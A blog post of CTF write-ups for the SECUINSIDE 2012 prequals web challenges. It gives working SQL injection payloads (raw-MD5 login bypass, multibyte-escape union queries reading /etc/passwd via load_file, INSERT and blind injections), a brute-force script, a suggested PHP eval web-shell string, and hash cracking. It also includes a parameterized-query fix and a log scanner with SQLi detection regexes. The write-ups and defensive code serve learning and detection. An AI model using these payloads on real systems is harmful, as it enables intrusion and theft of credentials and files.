A disturbing lack of taste. Just another WordPress site

11 Jun 2012

SECUINSIDE 2012 prequals CTF – web writeup (cliph + sqlgeek)

Hello,
I participated (as Tasteless) in the SECUINSIDE 2012 CTF prequals and really
liked it because many webchalls were available.
The other guys from the team were mostly missing, but I succeeded in finishing 5 of 6 challs.
Here are the writeups:

----------------------------------------------------------------------

cliph: login bypass using MD5 in raw format

$mpw=md5("$_POST[ip]",true);
$q=mysql_fetch_array(mysql_query("select * from member where id='$_POST[id]' and ip='$mpw'"));

In PHP, md5($string, true) returns the raw (binary) MD5 digest, which can contain characters like ', ", = etc.
Now, the shortest usable injection is an MD5 digest with '=' somewhere in it.
Here is a small PHP script to find those:
<?php
// Brute-force integers whose raw MD5 digest contains the byte sequence '=' ;
// strpos() returns false when the needle is absent, so compare with !== false.
for($i=1;$i<=100000000;$i++)
    if(strpos(md5($i,true),"'='")!==false) echo $i."\n";
?>
It gave me a few numbers; I used 2998869.
Log in as
id:admin
ip:2998869
making the query
select * from member where id='admin' and ip='¦-'=':ÚTŕÍ,pžÇ˝ß'
which is true because in MySQL SELECT 'a'='b'='c' is true.
The flag was visible when you logged in as admin.
It actually required you to have at least 2147483647 gold; I guess admin had that much...
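The same lookup with the digest bound as a parameter, as an added example (not the challenge's code): SQLite stands in for MySQL, ADMIN_IP is a constructed value, and raw_digest_metachars() shows which bytes of a raw digest would be pasted verbatim into the string-built query above.

```python
import hashlib
import sqlite3

# Constructed for this demo: the ip the admin registered with. The challenge
# stores md5($ip, true), i.e. the raw 16-byte digest, so we keep that shape.
ADMIN_IP = b"10.0.0.1"
SQL_METACHARS = b"'\"\\="  # bytes that alter the meaning of a quoted literal


def raw_md5(value: bytes) -> bytes:
    """PHP md5($s, true): 16 raw bytes, each of which may be any value."""
    return hashlib.md5(value).digest()


def hex_md5(value: bytes) -> str:
    """PHP md5($s): 32 lowercase hex chars; never a quote, backslash or '='."""
    return hashlib.md5(value).hexdigest()


def raw_digest_metachars(value: bytes) -> bytes:
    """The SQL metacharacters a raw digest of `value` would paste verbatim
    into a string-built query (empty means this input is harmless)."""
    return bytes(b for b in raw_md5(value) if b in SQL_METACHARS)


def vulnerable_query(user_id: str, ip: bytes) -> str:
    """The challenge's query as built by string interpolation."""
    digest = raw_md5(ip).decode("latin-1")  # byte-for-byte, as PHP pastes it
    return f"select * from member where id='{user_id}' and ip='{digest}'"


def build_member_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table member (id text, ip blob)")
    conn.execute("insert into member values (?, ?)", ("admin", raw_md5(ADMIN_IP)))
    return conn


def lookup_member(conn: sqlite3.Connection, user_id: str, ip: bytes):
    """Hardened form: the digest is a bound parameter, so any ' or = in it is
    compared as data and can never terminate the literal or add a condition."""
    row = conn.execute(
        "select id from member where id = ? and ip = ?",
        (user_id, raw_md5(ip)),
    ).fetchone()
    return row[0] if row else None
```

Using hex_md5() instead of the raw digest removes the problem at the source as well, since a hex string can never carry a quote.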

----------------------------------------------------------------------

sqlgeek

This was the hardest of the webchalls. I didn't really finish it, but I was pretty close.

$_GET[view]=mb_convert_encoding($_GET[view],'utf-8','euc-kr');
if(eregi("from|union|select|\(|\)| |\*|/|\t|into",$_GET[view])) exit("Access Denied");
if(strlen($_GET[view])>17) exit("Access Denied");
$q=mysql_fetch_array(mysql_query("select * from challenge5 where ip='$_GET[view]' and (str+dex+lnt+luc)='$_GET[stat]'"));

magic_quotes was ON, and I used the multibyte character %bf%5c in order to be able to use $_GET[stat] for injection.
so,
index.php?view=%bf%5c&stat= or 3=2 union select 1,2,3,4,5,6,7-- -
Now, $_SESSION[read_me]="/etc/passwd"; tells us to read /etc/passwd
so
index.php?view=%bf%5c&stat= or 3=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7-- -

From there I saw ReADDDDDDD______MEEEEEEEEEEEEE.php, and it included your session, returning its values.
Now I didn't know what to do. I knew I needed to get command execution somehow but didn't know how.
After the CTF ended, user "hvortex" said I could manipulate $_SESSION[id] due to extract($_GET); which I didn't see...
I guess you could use something like $_SESSION[id]=<?php eval($_GET[cmd]); ?> then include it and read the flag. I was wrong; here is the whole writeup: Reiners' blog

This is one of the best webchalls I have encountered so far. =)

11 Jun 2012

SECUINSIDE 2012 prequals CTF – web writeup (beast + yhsj)

beast: INSERT query injection

Here you could register and you would get guest status; admin was needed for the flag.

Here is the important snippet of the registration code:

if(strlen($_POST[phone])>=20) exit("Access Denied");
if(eregi("admin",$_POST[id])) exit("Access Denied");
if(eregi("load|admin|0x|#|hex|char|ascii|ord|from|select|union|infor|challenge",$_POST[phone])) exit("Access Denied");

@mysql_query("insert into challenge4 values('$_POST[id]',$_POST[phone],'guest')");

So, id was filtered and phone had to be less than 20 chars.
It took me quite long to get this one, but the solution is simple:
id=nimda
phone=1,reverse(id))--%0a

making the query:
insert into challenge4 values('nimda',1,reverse(id))-- ,'guest')
Now log in as "nimda" with phone "1" and you get the flag.
^^ pretty nice one!

----------------------------------------------------------------------

yhsj: insert query injection

if(eregi("update|set|union|#|char|ascii|hex|infor|mysql|\.|load",$_POST[tm])) exit("<center><font color=brown>Access Denied</font></center>");
@mysql_query("insert into talk_msg values(1,'$_SESSION[id]','$ck[id]','$_POST[msg]',$_POST[tm])");

$_POST[tm] was the entry point; submit something like

1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1

making the query
insert into talk_msg values(1,'plit','plit','blablabla',1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1)

Now, admin's hash is in your message. It was salted like md5('zombie_$pw'), so I used hashcat + dictionaries to crack it, getting zombie_hellsonic.
Log in as admin:zombie_hellsonic and get the flag.

11 Jun 2012

SECUINSIDE 2012 prequals CTF – web writeup (batman + zombie)

batman: hard-filtered blind SQL injection

http://61.42.25.29/0f9dd0e033bb0854c9de75939680ce66/?no=1 (link is down)

I didn't have the source for this one; most keywords were blocked.
The query looked something like
SELECT id,no FROM batman WHERE no=$_GET['no'];
The only working string functions I could find were
instr, position, substr

All kinds of operators and spaces were blocked, so I used this:
?no=if(instr(id,0x30),3,5)
So, if 0x[something] is in "id" I would get some text; if not, it was a blank page.
I used a PHP script to quickly discover all the chars used, and they were:
D O P W d o p w
Then I manually mixed chars like this to get the flag:
?no=if(instr(id,0x646f),3,5)
etc.
The flag was opwwddddoo.
instr is case-insensitive, and I luckily guessed the flag is lowercase :D

----------------------------------------------------------------------

zombie: blind SQL injection after ORDER BY...

if(eregi("load|union| |\t|/|char|ascii|hex|<|>|infor|\.|challenge2|challenge3|challenge4",$dd)) exit("Access Denied");
$q=mysql_query("select * from challenge1 order by $dd desc");

The procedure is the same as for batman, but this time I used LIKE (every whitespace was %0a).

if((select password from challenge1 where id=0x61646d696e and password like 0x253025),1,(select 1 from challenge1)) -> if the LIKE is false, it errors (Subquery returns more than one row)

I used a PHP script to get it char by char, finishing with OLDZOMBIEEEE if I remember correctly. Again, I guessed the case of the flag ^^
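From the other side of the wire: a small access-log scanner, added here as an example (not from the writeup), whose signatures are the payload shapes of the batman and zombie probes plus the union/load_file, hex-literal and comment-terminator tricks from the earlier challs. The log lines are constructed Apache-style replays of the requests described above; the normalizer folds the %0a/%09 whitespace substitution so the regexes see ordinary SQL.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes in these writeups: batman's
# if(instr(...)) probes, zombie's LIKE-subquery probe, the union/load_file
# queries, hex-encoded strings and comment terminators.
SIGNATURES = {
    "blind-instr-probe": re.compile(r"\bif\s*\(\s*(instr|position|substr)\s*\(", re.I),
    "blind-like-subquery": re.compile(r"\(\s*select\b.*\blike\s+0x[0-9a-f]+", re.I | re.S),
    "file-read": re.compile(r"\bload_file\s*\(", re.I),
    "union-select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "hex-literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "comment-terminator": re.compile(r"(--\s|#)"),
}
# %0a, %09 and /**/ stand in for the blocked space character; fold them to one space.
WHITESPACE_SUBST = re.compile(r"(\s|/\*.*?\*/)+", re.S)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def normalize(path: str) -> str:
    """Decode twice (catches %25xx double encoding) and fold whitespace tricks."""
    return WHITESPACE_SUBST.sub(" ", unquote_plus(unquote_plus(path)))


def classify(path: str) -> list:
    """Names of every signature that matches the normalized request path."""
    q = normalize(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]


def scan(log_text: str) -> list:
    """(client ip, raw path, matched signatures) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m["path"])):
            hits.append((m["ip"], m["path"], tags))
    return hits


# Constructed Apache-style log lines replaying the requests described above.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jun/2012:10:01:02 +0900] "GET /?no=1 HTTP/1.1" 200 512
203.0.113.5 - - [11/Jun/2012:10:01:09 +0900] "GET /?no=if(instr(id,0x30),3,5) HTTP/1.1" 200 512
203.0.113.5 - - [11/Jun/2012:10:02:10 +0900] "GET /?view=%bf%5c&stat=%20or%203=2%20union%20select%20load_file(0x2f6574632f706173737764),2,3,4,5,6,7--%20- HTTP/1.1" 200 2048
203.0.113.9 - - [11/Jun/2012:10:03:00 +0900] "GET /?dd=if((select%0apassword%0afrom%0achallenge1%0awhere%0aid=0x61646d696e%0aand%0apassword%0alike%0a0x253025),1,(select%0a1%0afrom%0achallenge1)) HTTP/1.1" 500 0
"""

if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, tags, path[:60])
```

The error-based zombie probe also shows up as a burst of 500s from one client, which is worth alerting on independently of any signature.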

----------------------------------------------------------------------

Well, this is one pretty damn long wall of text :D...

I'd like to thank the Secuinside people for this great CTF; I really enjoyed it and learned a few new things and tricks!
Also thanks to Reiners for his blog and to hvortex for the sqlgeek solution!

Regards,
Plitvix
